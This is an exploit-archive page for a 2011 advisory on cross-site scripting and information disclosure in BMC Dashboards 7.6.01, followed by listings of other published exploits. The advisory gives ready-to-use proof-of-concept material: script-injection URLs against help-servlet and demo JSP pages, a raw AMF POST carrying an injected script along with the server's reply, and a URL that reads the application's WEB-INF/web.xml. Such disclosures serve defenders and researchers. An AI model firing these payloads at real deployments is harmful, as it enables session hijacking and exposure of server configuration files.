Menu

Search for hundreds of thousands of exploits

"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure"

Author

Exploit author

"Richard Brain"

Platform

Exploit platform

jsp

Release date

Exploit published date

2011-05-05

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
source: https://www.securityfocus.com/bid/47731/info

BMC Dashboards is prone to to multiple information-disclosure and cross-site scripting issues because the application fails to properly sanitize user-supplied input.

A remote attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Exploiting the information-disclosure issues allows the attacker to view local files within the context of the webserver process.

a)
https://www.example.com/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm

b)
https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>

c) multiple XSS within demo pages
https:/www.example.com/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>

https://www.example.com/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean

d) Multiple XSS as the AMF stream is unfiltered

POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58.....    ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation

bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
   ..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#.    name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection    ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade

results:-
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651

......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber

codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d

Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties. No
authentication is required to exploit this vulnerability.

2) Application is vulnerable to file source code reading limited to the
web-root.

https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)" webapps jsp max7253
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal" webapps jsp max7253
2019-09-16 "NetGain EM Plus 10.1.68 - Remote Command Execution" webapps jsp azams
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
Release Date Title Type Platform Author
2011-10-18 "Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Vulnerabilities" remote hardware "Richard Brain"
2011-05-16 "Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2011-05-09 "Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2011-05-05 "BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure" webapps jsp "Richard Brain"
2011-05-05 "BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities" webapps jsp "Richard Brain"
2010-12-21 "WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities" webapps php "Richard Brain"
2010-12-15 "HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting" webapps php "Richard Brain"
2010-12-14 "BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2010-12-13 "Mura CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm "Richard Brain"
2010-12-03 "DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting" webapps asp "Richard Brain"
2010-06-09 "Juniper Networks SA2000 SSL VPN Appliance - 'welcome.cgi' Cross-Site Scripting" remote hardware "Richard Brain"
2010-05-21 "3Com* iMC (Intelligent Management Center) - Traversal File Retrieval" webapps windows "Richard Brain"
2010-05-21 "3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws" webapps windows "Richard Brain"
2010-05-21 "Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting" webapps multiple "Richard Brain"
2010-01-28 "CommonSpot Server - '/utilities/longproc.cfm' Cross-Site Scripting" webapps cfm "Richard Brain"
2010-01-27 "HP System Management Homepage 3.0.2 - 'servercert' Cross-Site Scripting" remote multiple "Richard Brain"
2010-01-27 "SAP BusinessObjects 12 - URI redirection / Cross-Site Scripting" remote multiple "Richard Brain"
2009-09-25 "Activedition - '/activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2008-11-11 "Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities" webapps jsp "Richard Brain"
2008-04-23 "RSA Authentication Agent for Web 5.3 - Open Redirection" remote windows "Richard Brain"
2008-02-28 "Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure" webapps cgi "Richard Brain"
2008-02-28 "Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting" remote hardware "Richard Brain"
2007-11-30 "F5 Networks FirePass 4100 SSL VPN - 'My.Logon.php3' Cross-Site Scripting" remote hardware "Richard Brain"
2007-08-30 "Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting" webapps asp "Richard Brain"
2007-02-19 "Spyce 2.1.3 - '/docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'docs/examples/handlervalidate.spy?x' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - '/spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'spyce/examples/getpost.spy?Name' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'spyce/examples/request.spy?name' Cross-Site Scripting" webapps php "Richard Brain" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected